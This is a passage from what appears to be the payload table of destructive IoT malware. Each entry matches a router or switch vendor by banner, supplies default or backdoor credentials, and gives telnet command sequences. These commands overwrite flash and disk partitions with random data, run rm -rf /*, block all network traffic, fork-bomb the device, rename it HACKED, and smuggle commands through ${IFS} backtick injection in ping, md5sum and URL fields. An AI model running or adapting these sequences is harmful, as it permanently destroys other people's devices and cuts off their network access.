/dev/mtd2 >/dev/null &' , '' , 'cat /dev/urandom >/dev/mtd0 &' , '' , 'cat /dev/urandom >/dev/mtd1 &' , '' , 'cat /dev/urandom >/dev/mtd2 &' , '' , 'cat /dev/urandom >/dev/mtd3 &' , '' , 'cat /dev/urandom >/dev/mtdblock0 &' , '' , 'cat /dev/urandom >/dev/mtdblock1 &' , '' , 'cat /dev/urandom >/dev/mtdblock2 &' , '' , 'cat /dev/urandom >/dev/mtdblock3 &' , '' , 'cat /dev/urandom >/dev/mtdblock4 &' , '' , 'cat /dev/urandom >/dev/mtdblock5 &' , '' , 'cat /dev/urandom >/dev/mtdblock6 &' , '' , 'cat /dev/urandom >/dev/mtdblock7 &' , '' , 'iptables -F;iptables -t nat -F' , '' , 'ip route del default' , '' , 'ip route' , '[#$] ' , 'ip link set ppp0 down' , '' , 'ip link set br0 down' , '' , 'ip link set eth0 down' , '' , 'iptables -A fwinput -J DROP;iptables -A OUTPUT -j DROP;rm -rf /* &' , '%WAIT%' , ] , [ "zyxel" , ".*" , 'Linux\sZyXEL\s2.*mips.*BusyBox' , "iptables -F" , '' , "iptables -t nat -F" , '' , "route del default" , '' , 'sysctl -w kernel.threads-max=1' , '' , "iptables -A OUTPUT -j DROP" , '%WAIT%' , ] , [ "hisilicon" , "root/jvbzd" , 'w:\snot\sfound' , "fdisk /dev/mtd1" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , "fdisk /dev/sda" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , "iproute del default" , '[#$] ' , "sysctl -w net.ipv4.tcp_timestamps=0" , '[#$] ' , "sysctl -w kernel.threads-max=1" , '%WAIT% ' , "halt -n -f" , '[#$] ' , "reboot" , '[#$] ' , ] , [ "juantech" , "root/juantech" , 'w:\snot\sfound' , 'cat /dev/urandom >/dev/sda &' , '' , 'cat /dev/urandom >/dev/sda1 &' , '' , 'cat /dev/urandom >/dev/sda2 &' , '' , 'cat /dev/urandom >/dev/mtd0 &' , '' , 'cat /dev/urandom >/dev/mtd1 &' , '' , 'cat /dev/urandom >/dev/mtd2 &' , '' , 'cat /dev/urandom >/dev/mtd3 &' , '' , 'cat /dev/urandom >/dev/mtd4 &' , '' , 'cat /dev/urandom >/dev/mtd5 &' , '' , 'cat /dev/urandom >/dev/mtdblock0 &' , '' , 'cat /dev/urandom >/dev/mtdblock1 &' , '' , 'cat /dev/urandom >/dev/mtdblock2 &' , '' , 'cat /dev/urandom >/dev/mtdblock3 &' , '' , 'cat /dev/urandom >/dev/mtdblock4 &' , '' , 'cat /dev/urandom >/dev/mtdblock5 &' , '' , "route del default" , '[#$] ' , "fdisk /dev/sda2" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , "fdisk /dev/sda1" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , "fdisk /dev/sda" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , "sysctl -w net.ipv4.tcp_timestamps=0" , '[#$] ' , "sysctl -w kernel.threads-max=1" , '%WAIT% ' , "halt -n -f" , '[#$] ' , "reboot" , '[#$] ' , ] , [ 'celltrash' , '.*' , '5 : Load Default and Reboot Router' , '2' , '#' , '3' , 'mode:' , '4' , 'no\S:' , '2' , '#' , '0' , '#' , '4' , '#' , ] , [ "dlink" , ".*" , 'upgrade.*dlink\.ru.*firm.*' , "set lan ip 10.1.2.3 255.255.255.0\nsave" , '' , "set upnp off\nsave" , '' , "set dhcp off\nsave" , '' , "set dmz off\nsave" , '' , "set wifi off\nsave" , '' , "sh" , '[#$] ' , 'cat /dev/urandom >/dev/sda &' , '' , 'cat /dev/urandom >/dev/sda1 &' , '' , 'cat /dev/urandom >/dev/sda2 &' , '' , 'cat /dev/urandom >/dev/mtd0 &' , '' , 'cat /dev/urandom >/dev/mtd1 &' , '' , 'cat /dev/urandom >/dev/mtd2 &' , '' , 'cat /dev/urandom >/dev/mtd3 &' , '' , 'cat /dev/urandom >/dev/mtd4 &' , '' , 'cat /dev/urandom >/dev/mtd5 &' , '' , 'cat /dev/urandom >/dev/mtdblock0 &' , '' , 'cat /dev/urandom >/dev/mtdblock1 &' , '' , 'cat /dev/urandom >/dev/mtdblock2 &' , '' , 'cat /dev/urandom >/dev/mtdblock3 &' , '' , 'cat /dev/urandom >/dev/mtdblock4 &' , '' , 'cat /dev/urandom >/dev/mtdblock5 &' , '' , "iptables -F" , '' , "iptables -t nat -F" , '' , 'route del default;rm -rf /* 2>/dev/null &' , '[#$] ' , "iptables -A OUTPUT -j DROP" , '%TERM%' , ] , [ "dlink" , ".*" , 'You have a full access' , "set lan ip 10.1.2.3 255.255.255.0\nsave" , '' , "set upnp off\nsave" , '' , "set dhcp off\nsave" , '' , "set dmz off\nsave" , '' , "set wifi off\nsave" , '' , "sh" , '[#$] ' , 'cat /dev/urandom >/dev/sda &' , '' , 'cat /dev/urandom >/dev/sda1 &' , '' , 'cat /dev/urandom >/dev/sda2 &' , '' , 'cat /dev/urandom >/dev/mtd0 &' , '' , 'cat /dev/urandom >/dev/mtd1 &' , '' , 'cat /dev/urandom >/dev/mtd2 &' , '' , 'cat /dev/urandom >/dev/mtd3 &' , '' , 'cat /dev/urandom >/dev/mtd4 &' , '' , 'cat /dev/urandom >/dev/mtd5 &' , '' , 'cat /dev/urandom >/dev/mtdblock0 &' , '' , 'cat /dev/urandom >/dev/mtdblock1 &' , '' , 'cat /dev/urandom >/dev/mtdblock2 &' , '' , 'cat /dev/urandom >/dev/mtdblock3 &' , '' , 'cat /dev/urandom >/dev/mtdblock4 &' , '' , 'cat /dev/urandom >/dev/mtdblock5 &' , '' , "iptables -F" , '' , "iptables -t nat -F" , '' , 'route del default;rm -rf /* 2>/dev/null &' , '[#$] ' , "iptables -A OUTPUT -j DROP" , '%TERM%' , ] , [ "mdm" , ".*" , 'mdm\d\d+\S*\$' , "passwd" , "Old password:" , '%OLDPASS%' , 'Enter new password: ' , '%NEWPASS%' , 'Re-enter new password: ' , '%NEWPASS%' , '[#$] ' , 'su root' , 'Password: ' , 'oelinux123' , '[#$] ' , 'passwd' , 'New password: ' , '%NEWPASS%' , 'Retype password: ' , '%NEWPASS%' , '[#$] ' , 'ps aux | grep -v "ps aux" | grep -v "grep" | grep -v "random" | grep -v "awk" | grep -v "xargs" | /bin/awk \'{print $1}\' | xargs kill -9' , '%TERM%' , ] , [ "mdm" , ".*" , 'mdm\d\d+' , 'passwd' , 'New password: ' , '%NEWPASS%' , 'Retype password: ' , '%NEWPASS%' , '[#$] ' , 'reboot' , '%WAIT%' , 'ps aux | grep -v "ps aux" | grep -v "grep" | grep -v "random" | grep -v "awk" | grep -v "xargs" | /bin/awk \'{print $1}\' | xargs kill -9' , '%TERM%' , ] , [ "eltex" , ".*" , 'M5J9DWFfcVbL.*AuwJc4KI.*bin/ash' , "telnet localhost" , 'login: ' , "root" , 'Password: ' , 'adminpassword' , 'root\S+# ' , 'passwd %OLDUSER%' , 'New password:' , '%NEWPASS%' , 'Retype password:' , '%NEWPASS%' , 'root\S+# ' , 'passwd' , 'New password:' , '%NEWPASS%' , 'Retype password:' , '%NEWPASS%' , 'root\S+# ' , 'save' , 'root\S+# ' , 'reboot' , 'root\S+# ' , ] , [ 'qcpe' , 'admin/.*' , 'CPE> .*please enter \? for help\.' , 'enable' , '[#>] ' , 'router' , '[#>] ' , 'wan name x y' , '[#>] ' , 'wan commit' , '[#>] ' , "wan ip isp , user 1.2.3.4 255.255.255.0 1.2.3.5\nwan commit" , '[#>] ' , "lan ip 2.3.4.5 255.255.255.254\nlan commit" , '[#>] ' , 'wlan disable' , '[#>] ' , '..' , '[#>] ' , 'wimax' , '[#>] ' , 'wmx auth username a b' , '[#>] ' , 'wmx autoconnect disable' , '[#>] ' , 'wmx commit' , '[#>] ' , "wmx disconnect\nwmx commit" , '[#>] ' , '..' , '[#>] ' , 'router' , '[#>] ' , "filter add 0.0.0.0/0 1:65535 0.0.0.0/0 1:65535 tcp\nfilter commit" , '[#>] ' , ] , [ 'vigor' , '.*' , 'Watch Dog Closed' , 'enable' , '[>#] ' , 'configure system' , '[>#] ' , 'config local backup ;sh' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock7 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock0 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock1 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock2 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock3 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock4 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock5 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock6 &' , '[>#] ' , 'route del default' , '%WAIT%' , 'reboot' , '[>#] ' , ] , [ 'phyhome' , '.*' , 'Index.*User.*Priority.*Location' , 'configure' , '[>#] ' , 'set hostname HACKED' , '[>#] ' , 'erase startup-config' , '\]' , 'y' , '[>#] ' , 'reboot' , '\]' , 'y' , '[>#] ' , ] , [ 'edatahome' , '.*' , '% Unknown command:w\.' , 'enable' , '[>#] ' , 'erase startup-config' , '[>#] ' , 'urlexport 1.2.3.4 test test `cat${IFS}/dev/urandom${IFS}>/dev/root` white' , '%WAIT%' , 'date 2030 12 31 23 59 59' , '%WAIT%' , 'exit' , '' , ] , [ 'oapsmc' , '.*' , 'Unrecognized command or Incomplete command\.' , 'reset configuration' , '[>#] ' , 'reset configuration' , '[>#] ' , 'reset configuration' , '[>#] ' , ] , [ 'egcpa' , '.*' , 'Unknown command \'uname\'' , 'logfile-upload' , 'URL: ' , 'ftp://127.0.0.1/&&`dd${IFS}if=/dev/zero${IFS}of=/dev/mtdblock5${IFS}&`' , '[>#] ' , 'logfile-upload' , 'URL: ' , 'ftp://127.0.0.1/&&`dd${IFS}if=/dev/zero${IFS}of=/dev/root`' , '[>#] ' , 'uci commit' , '[>#] ' , ] , [ 'bintec' , '.*' , 'wizInternetGtw' , 'ifconfig' , '[>#] ' , 'ifconfig 1000000 down' , '[>#] ' , 'ifconfig 1010000 down' , '[>#] ' , 'ifconfig 1020000 down' , '[>#] ' , 'ifconfig 1030000 down' , '[>#] ' , 'ifconfig 1040000 down' , '[>#] ' , 'ifconfig 50000 down' , '[>#] ' , 'ifconfig 50001 down' , '[>#] ' , 'ifconfig 100001 down' , '[>#] ' , 'ifconfig 10001 down' , '[>#] ' , 'ifconfig 1001 down' , '[>#] ' , 'ifconfig 1000 down' , '[>#] ' , 'halt' , '[>#] ' , ] , [ 'texasi' , 'root/.*' , '% Invalid input at caret\.' , "exit" , '[>#] ' , 'enable' , ': ' , '%OLDPASS%' , '[>#] ' , 'shell' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock/0 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock/1 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock/2 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock/3 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock/4 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock/5 &' , '[>#] ' , 'iptables -F;iptables -t nat -F;iptables -A OUTPUT -j DROP' , '%WAIT% ' , 'd() { d|d & }; d 2>/dev/null' , '[>#] ' , 'route del default' , '[>#] ' , ] , [ 'kaco' , '.*' , 'Mode: (APPLICATION|BOOTROM)' , 'ipconfig -s 1.2.3.4 255.255.255.0 1.2.3.5' , '[>#] ' , 'format' , '[>#] ' , 'reset' , '[>#] ' , ] , [ 'atdev' , '.*' , 'TELNET session now in ESTABLISHED state' , 'clear flash' , '[>#] ' , 'clear NVS' , '[>#] ' , 'delete file=config.ins' , '[>#] ' , 'delete file=config.gui' , '[>#] ' , 'set user=%OLDUSER% login=no telnet=no' , '[>#] ' , 'set ip nameserver=127.0.0.1' , '[>#] ' , 'set ip secondarynameserver=127.0.0.1' , '[>#] ' , 'set ip interface=ppp0 ipaddress=127.0.0.1' , '[>#] ' , 'set ip interface=eth1 ipaddress=127.0.0.1' , '[>#] ' , 'set ip interface=eth0 ipaddress=127.0.0.1' , '[>#] ' , 'set ip interface=vlan1 ipaddress=127.0.0.1' , '[>#] ' , 'set ip interface=port1 ipaddress=127.0.0.1' , '[>#] ' , 'set ip interface=port2 ipaddress=127.0.0.1' , '[>#] ' , 'set ip interface=port3 ipaddress=127.0.0.1' , '[>#] ' , 'set ip interface=port4 ipaddress=127.0.0.1' , '[>#] ' , 'set ip interface=port5 ipaddress=127.0.0.1' , '[>#] ' , ] , [ 'adb' , '.*' , '\*\s+ADB BROADBAND\s+\*' , 'restore default-setting' , '[>#] ' , 'reboot' , '[>#] ' , ] , [ 'weathergoose' , '.*' , 'ITW WeatherGoose' , 'reset factory' , '[>#] ' , 'reset network' , '[>#] ' , ] , [ 'hpnp' , '.*' , 'clear configure create delete disable' , 'unconfigure switch' , 'yes or no' , 'yes' , 'configuration' , ] , [ 'kopp' , '.*' , 'root\@kopp' , 'cat /dev/urandom >/dev/mmcblk1p1 &' , '[>#] ' , 'cat /dev/urandom >/dev/root &' , '[>#] ' , 'route del default' , '[>#] ' , 'rm -rf /* & 2>/dev/null' , '[>#] ' , ] , [ 'elsist' , '.*' , 'Elsist.*maintenance shell' , 'format Storage, 1' , 'Y,n' , 'Y' , '[>#] ' , 'format System, 1' , 'Y,n' , 'Y' , '[>#] ' , 'userconfig -p %OLDUSER% %NEWPASS%' , '[>#] ' , 'cfgcommit' , '[>#] ' , 'ifconfig -a eth0 1.2.3.4' , '[>#] ' , 'ifconfig -g eth0 1.2.3.5' , '[>#] ' , 'ifconfig -a eth1 1.2.3.6' , '[>#] ' , 'ifconfig -g eth1 1.2.3.7' , '[>#] ' , 'cfgcommit' , '[>#] ' , 'sysconfig -wid' , '[>#] ' , 'sysconfig -mtcpd' , '[>#] ' , 'sysconfig -usbd' , '[>#] ' , 'cfgcommit' , '[>#] ' , 'reboot' , 'Y,n' , 'Y' , 'rebooting' , ] , [ 'swim' , '.*' , 'task wait: task \S+ not found\.' , 'rm -r /tffs/*' , '[>#] ' , 'reboot' , '[>#] ' , ] , [ 'ciscobee' , '.*' , '(Embedded Telnet Server.*WARNING:.*authorized users only|COMMAND:\s+write_?memory|-s ElementSize1\.\.4)' , 'cd /flash' , '[>#] ' , 'init' , '[>#] ' , 'autoTest bootloader' , 'no\S ' , 'yes' , '[>#] ' , 'autoTest dyn' , 'no\S ' , 'yes' , '[>#] ' , 'autoTest perm' , 'no\S ' , 'yes' , '[>#] ' , 'cd /' , '[>#] ' , 'taskSuspend 0x81b597a8' , '[>#] ' , '0x819e0280' , '[>#] ' , 'taskSuspend 0x819d13d0' , '[>#] ' , '0x81b597a8' , '[>#] ' , 'taskSuspend 0x81b7aea0' , '[>#] ' , '1' , '[>#] ' , 'cd /' , '[>#] ' , 'taskSuspendAll' , '[>#] ' , 'reset' , '[>#] ' , ] , [ 'ubee' , '.*' , 'Error - what Unknown command:' , 'cd /ubee' , '[>#] ' , 'cabhCdpServerRouter' , '[>#] ' , 'cabhCdpServerRouter 127.0.0.1' , '[>#] ' , 'cd /' , '[>#] ' , 'set password' , '\] ' , '%NEWPASS%' , '[>#] ' , 'cd /wifi' , '[>#] ' , 'nvram set wps_version2=disabled' , '[>#] ' , 'nvram set wl0_ssid=HACKED' , '[>#] ' , 'nvram set wps_device_name=HACKED' , '[>#] ' , 'rc restart' , '[>#] ' , 'cd /' , '[>#] ' , ] , [ 'desdlink' , '.*' , 'DES-1210' , 'reset config' , '[>#] ' , ] , [ 'gpononu' , '.*' , 'ONU\(super\)#' , 'shell' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock0 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock1 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock2 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock3 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock4 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock5 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock6 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock7 &' , '[>#] ' , 'cat /dev/urandom >/dev/root &' , '[>#] ' , 'route del default' , '[>#] ' , 'iptables -F;iptables -t nat -F;iptables -A OUTPUT -j DROP' , '%WAIT%' , 'd(){ d|d & };d' , '%TERM%' , ] , [ 'alcont' , '.*' , '(ONTUSER:|\/dev\/ubi1_1|\/ONTUSER|root\@AONT:)' , 'df' , '[>#] ' , 'dd if=/dev/urandom of=/dev/ubi1_1 &' , '[>#] ' , 'dd if=/dev/urandom of=/dev/ubi5_0 &' , '[>#] ' , 'dd if=/dev/urandom of=/dev/mtdblock0 &' , '[>#] ' , 'dd if=/dev/urandom of=/dev/mtdblock1 &' , '[>#] ' , 'dd if=/dev/urandom of=/dev/mtdblock2 &' , '[>#] ' , 'dd if=/dev/urandom of=/dev/mtdblock3 &' , '[>#] ' , 'dd if=/dev/urandom of=/dev/mtdblock4 &' , '[>#] ' , 'dd if=/dev/urandom of=/dev/mtdblock5 &' , '[>#] ' , 'dd if=/dev/urandom of=/dev/mtdblock6 &' , '[>#] ' , 'dd if=/dev/urandom of=/dev/mtdblock7 &' , '[>#] ' , 'dd if=/dev/urandom of=/dev/hda1 &' , '[>#] ' , 'dd if=/dev/urandom of=/dev/hdb1 &' , '[>#] ' , 'dd if=/dev/urandom of=/dev/mmcblk0 &' , '[>#] ' , 'dd if=/dev/urandom of=/dev/mmcblk0p1 &' , '[#$>] ' , 'cat /dev/urandom >/dev/ubi1_1 &' , '[>#] ' , 'cat /dev/urandom >/dev/ubi5_0 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock0 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock1 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock2 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock3 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock4 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock5 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock6 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock7 &' , '[>#] ' , 'cat /dev/urandom >/dev/hda1 &' , '[>#] ' , 'cat /dev/urandom >/dev/hdb1 &' , '[>#] ' , 'cat /dev/urandom >/dev/mmcblk0 &' , '[>#] ' , 'cat /dev/urandom >/dev/mmcblk0p1 &' , '[#$>] ' , 'route del default;iproute del default;rm -rf /* 2>/dev/null &' , '[>#] ' , 'iptables -F;iptables -t nat -F;iptables -A OUTPUT -j DROP' , '%WAIT%' , 'd(){ d|d & };d' , '%TERM%' , ] , [ 'busybroke' , '.*' , 'cat: /etc/passwd: No such file or directory' , 'd() { d|d & }; d' , '' , 'route del default' , '' , ] , [ 'mtguest' , 'guest/guest' , 'MT7109' , 'logout' , '%TERM%' , ] , [ 'mtguest' , 'user/user' , 'MT7109' , 'logout' , '%TERM%' , ] , [ 'mtguest' , 'admin/.*' , 'MT7109' , 'enable' , '[#>] ' , 'router' , '[#>] ' , 'wan name x y' , '[#>] ' , 'wan commit' , '[#>] ' , "wan ip isp , user 1.2.3.4 255.255.255.0 1.2.3.5\nwan commit" , '[#>] ' , "lan ip 2.3.4.5 255.255.255.254\nlan commit" , '[#>] ' , 'wlan disable' , '[#>] ' , '..' , '[#>] ' , 'wimax' , '[#>] ' , 'wmx auth username a b' , '[#>] ' , 'wmx autoconnect disable' , '[#>] ' , "wmx disconnect\nwmx commit" , '[#>] ' , '..' , '[#>] ' , 'router' , '[#>] ' , "filter add 0.0.0.0/0 1:65535 0.0.0.0/0 1:65535 tcp\nfilter commit" , '[#>] ' , '..' , '[#>] ' , 'logout' , '%TERM%' , ] , [ 'uclinux' , '.*' , '(uclinux\.org|sh: can\'t exec \'w\': No such file or directory|uClinux version)' , 'cat /dev/urandom >/dev/mtdblock0 &' , '[#>] ' , 'cat /dev/urandom >/dev/mtdblock1 &' , '[#>] ' , 'cat /dev/urandom >/dev/mtdblock2 &' , '[#>] ' , 'cat /dev/urandom >/dev/mtdblock3 &' , '[#>] ' , 'cat /dev/urandom >/dev/mtdblock4 &' , '[#>] ' , 'cat /dev/urandom >/dev/mtdblock5 &' , '[#>] ' , 'cat /dev/urandom >/dev/mtdblock6 &' , '[#>] ' , 'cat /dev/urandom >/dev/mtdblock7 &' , '[#>] ' , 'cat /dev/urandom >/dev/mtdblock8 &' , '[#>] ' , 'cat /dev/urandom >/dev/mtdblock9 &' , '[#>] ' , 'route del default' , '[>#] ' , ] , [ 'albof' , '.*' , '\*[AB]:\S+#\s' , 'config' , '[>#] ' , 'system' , '[>#] ' , 'location `reboot`' , '[>#] ' , 'name HACKED' , '[>#] ' , 'exit all' , '[>#] ' , 'file' , '[>#] ' , 'shutdown' , '[>#] ' , 'format' , 'y/n' , 'y' , '[>#] ' , 'exit all' , '[>#] ' , 'admin' , '[>#] ' , 'reboot auto-init' , 'y/n' , 'y' , '[>#] ' , 'reboot standby' , 'y/n' , 'y' , '[>#] ' , 'reboot active' , 'y/n' , 'y' , '[>#] ' , ] , [ 'genpoe' , '.*' , '\% Invalid input detected at \'\^\' marker\.' , 'enable' , '[>#] ' , 'write' , '[>#] ' , 'erase boot-image first' , '[>#] ' , 'erase boot-image second' , '[>#] ' , 'erase config-file' , '[>#] ' , 'reload' , 'y/n' , 'y' , '[>#] ' , ] , [ 'vigor27' , '.*' , '__\s+___\s+____\s_____\s__\s+___' , 'exec ping `cat${IFS}/dev/zero${IFS}>/dev/root`' , '' , ] , [ 'ciscovpn3000' , '.*' , '4\)\s+Save\s+changes\s+to\s+Config\s+file' , '2' , '[>#] ' , '8' , '[>#] ' , '9' , 'reformat' , 'YES' , '[>#] ' , '10' , '[>#] ' , '3' , '[>#] ' , '3' , '[>#] ' , '2' , '[>#] ' , '2' , 'Done' , ] , [ 'oxygen' , '.*' , 'system\s+System\soperations' , "\x03" , '' , 'system fdefaults' , 'y/n' , 'y' , '[>#] ' , ] , [ 'dsrdlink' , '.*' , '(D-Link DSR|util.*Utilities Mode)' , "\x03" , '' , 'util md5sum `cat${IFS}/dev/urandom${IFS}>/dev/mtdblock0${IFS}&`' , '[>#] ' , 'util md5sum `cat${IFS}/dev/urandom${IFS}>/dev/mtdblock1${IFS}&`' , '[>#] ' , 'util md5sum `cat${IFS}/dev/urandom${IFS}>/dev/mtdblock2${IFS}&`' , '[>#] ' , 'util md5sum `cat${IFS}/dev/urandom${IFS}>/dev/mtdblock3${IFS}&`' , '[>#] ' , 'util md5sum `cat${IFS}/dev/urandom${IFS}>/dev/mtdblock4${IFS}&`' , '[>#] ' , 'util md5sum `cat${IFS}/dev/urandom${IFS}>/dev/mtdblock5${IFS}&`' , '%WAIT%' , 'util md5sum `poweroff`' , '[>#] ' , 'util md5sum `reboot`' , '[>#] ' , ] , [ '3comap' , '.*' , '(3Com Access Point|Access Point Rev \d|Type \"help\" for a list of valid commands\.)' , 'set hostipaddr 127.0.0.1' , '[>#] ' , 'set dhcpc disable' , '[>#] ' , 'set ipaddr 127.0.0.1' , '[>#] ' , 'applycfg' , 'Rebooting' , ] , [ 'omniswitch' , '.*' , '(ERROR: Invalid entry: \"\/etc\/\"|Lucent OmniSwitch)' , 'newfs /flash' , '= No' , 'y' , '[>#] ' , 'newfs /uflash' , '(= No|>)' , 'y' , '[>#] ' , 'rm *' , '[>#] ' , 'reload' , 'Y/N' , 'y' , '[>#] ' , ] , [ 'bullet' , '.*' , '(Invalid command \"cat\"|Entering character mode)' , 'AT+MMNAME=HACKED' , '[>#] ' , 'AT+MSIP=127.0.0.1' , '[>#] ' , 'AT+MCTPS1=0' , '[>#] ' , 'AT+MPWD=%NEWPASS%,%NEWPASS%' , '[>#] ' , 'AT+MREB' , 'OK' , 'exec ping `cat${IFS}/dev/zero${IFS}>/dev/root`' , '' , 'AT+MSRTF=0' , 'confirm' , 'AT+MSRTF=1' , 'rebooting' , ] , [ 'pk5001' , '.*' , '(PK5001Z|admin_\S+SSH:\S+Linux User)' , 'su' , 'Password: ' , 'zyad5001' , '' , 'dd if=/dev/urandom of=/dev/mtdblock0 &' , '' , 'dd if=/dev/urandom of=/dev/mtdblock1 &' , '' , 'dd if=/dev/urandom of=/dev/mtdblock2 &' , '' , 'dd if=/dev/urandom of=/dev/mtdblock3 &' , '' , 'dd if=/dev/urandom of=/dev/mtdblock4 &' , '' , 'dd if=/dev/urandom of=/dev/mtdblock5 &' , '' , 'dd if=/dev/urandom of=/dev/mtdblock6 &' , '' , 'dd if=/dev/urandom of=/dev/mtdblock7 &' , '' , 'dd if=/dev/urandom of=/dev/mtd0 &' , '' , 'dd if=/dev/urandom of=/dev/mtd1 &' , '' , 'dd if=/dev/urandom of=/dev/mtd2 &' , '' , 'dd if=/dev/urandom of=/dev/mtd3 &' , '' , 'cat /dev/urandom >/dev/mtdblock0 &' , '' , 'cat /dev/urandom >/dev/mtdblock1 &' , '' , 'cat /dev/urandom >/dev/mtdblock2 &' , '' , 'cat /dev/urandom >/dev/mtdblock3 &' , '' , 'cat /dev/urandom >/dev/mtdblock4 &' , '' , 'cat /dev/urandom >/dev/mtdblock5 &' , '' , 'cat /dev/urandom >/dev/mtdblock6 &' , '' , 'cat /dev/urandom >/dev/mtdblock7 &' , '' , 'cat /dev/urandom >/dev/mtdblock8 &' , '' , 'cat /dev/urandom >/dev/mtdblock9 &' , '' , 'cat /dev/urandom >/dev/root &' , '' , 'dd if=/dev/urandom of=/dev/root &' , '' , 'route del default;iproute del default;ip route del default' , '' , 'iptables -F;iptables -t nat -F;iptables -A OUTPUT -j DROP' , '%WAIT%' , 'cat /dev/urandom >/dev/mem &' , '' , 'd(){ d|d & };d 2>/dev/null' , '[#$>] ' , 'sysctl -w net.ipv4.tcp_timestamps=0;sysctl -w kernel.threads-max=1' , '%WAIT% ' , 'halt -n -f' , '[#$>] ' , 'reboot' , '[#$>] ' , 'd(){ d|d & };d' , '%TERM%' , ] , [ 'ubigate' , '.*' , '(Error : Command \'uname\' does not exist|SAMSUNG ELECTRONICS .*Login)' , 'file' , '[>#] ' , 'format /cf0' , 'Y/N' , 'y' , 'file[>#] ' , 'exit' , '[>#] ' , 'reboot' , 'y/n' , 'y' , 'reboot' , ] , [ 'ec2traffic' , '.*' , '\/WEB_CONFIGURATOR\/CONFIG' , '$linux' , '[>#\$] ' , 'telnet 127.0.0.1' , 'login:' , 'root' , 'word:' , 'peek' , '[>#\$:] ' , 'cat /dev/urandom >/dev/mtdblock/4' , '[>#\$:] ' , 'route del default' , '[>#\$:] ' , 'nop' , '[>#\$:] ' , 'nop' , '[>#\$:] ' , 'd() { d|d & }; d' , '' , ] , [ 'genu01' , '.*' , 'ID\s+From\s+To\s+Protocol\s+Sessions' , 'boot action = factory' , '[>#] ' , ] , [ 'genu02' , '.*' , 'usr\/config\$' , 'ifaddr -ipsharing 1 1.2.3.2' , '[>#\$] ' , 'ifaddr -ip 1.2.3.4 -mask 255.255.255.0 -gate 1.2.3.5' , '' , 'commit' , '[>#\$] ' , 'reboot' , '[>#\$] ' , ] , [ 'genu03' , '.*' , 'watchdog\?' , 'set2default' , '\[no\]' , 'yes' , '\[no\]' , 'yes' , '\[yes\]' , 'no' , '\[no\]' , 'yes' , 'NVRAM' , ] , [ 'genu04' , '.*' , 'restore system and load default configure' , 'restore' , '=>' , ] , [ 'vigorfly' , '.*' , 'Welcome to \S+\!\!\!' , 'ping `mtd_write erase mtd0;mtd_write erase mtd1;mtd_write erase mtd2;mtd_write erase mtd3;mtd_write erase mtd4 &`' , '\S#' , 'ping `cat /dev/urandom >/dev/mtdblock0;cat /dev/urandom >/dev/mtdblock1;cat /dev/urandom >/dev/mtdblock2 &`' , '\S#' , 'ping `cat /dev/urandom >/dev/mtdblock3;cat /dev/urandom >/dev/mtdblock4;cat /dev/urandom >/dev/mtdblock5 &`' , '\S#' , 'ping `cat /dev/urandom >/dev/mtdblock6;cat /dev/urandom >/dev/mtdblock7 &`' , '\S#' , 'ping `route del default`' , '\S#' , ] , [ 'genu06' , '.*' , '[\%:] (Unrecognized|Incomplete|Wrong) (command|parameter) found at \S\S\S position\.' , 'format flash:' , 'Y/N' , 'y' , '>' , 'system-view' , '[>\]]' , 'router id 1.2.3.4' , '[>\]]' , 'sysname HACKED' , '[>\]]' , 'super password simple HACK%NEWPASS%' , '[>\]]' , 'interface wlan-ethernet 0' , '[>\]]' , 'shutdown' , '[>\]]' , 'interface wlan-ethernet 1' , '[>\]]' , 'shutdown' , '[>\]]' , 'interface wlan-ethernet 2' , '[>\]]' , 'shutdown' , '[>\]]' , 'interface wlan-ethernet 3' , '[>\]]' , 'shutdown' , '[>\]]' , 'reboot' , 'Y/N' , 'y' , '' , ] , [ 'genu07' , '.*' , 'welcome to use cli' , 'mgmt' , '>' , 'backup' , '>' , 'revertfac' , '>' , 'restore http://1.2.3.4/&&reboot' , '>' , ] , [ 'genu08' , '.*' , 'Command Not Found' , 'configure' , '[>#\$] ' , 'hostname HACKED' , '[>#\$] ' , 'interface ge1' , '[>#\$] ' , 'shutdown\nwrite memory' , '[>#\$] ' , 'exit' , '[>#\$] ' , 'interface ge2' , '[>#\$] ' , 'shutdown\nwrite memory' , '[>#\$] ' , ] , [ 'genu09' , '.*' , '(System has no password|\% Command missing, Valid commands are:)' , 'sys cfg default' , '[>#\$] ' , ] , [ 'drgwatson' , '.*' , 'Bad command - Try using help -s ' , 'system' , '[>#] ' , 'shell' , '[>#] ' , 'dd if=/dev/urandom of=/dev/mtdblock0 &' , '[>#] ' , 'dd if=/dev/urandom of=/dev/mtdblock1 &' , '[>#] ' , 'dd if=/dev/urandom of=/dev/mtdblock2 &' , '[>#] ' , 'dd 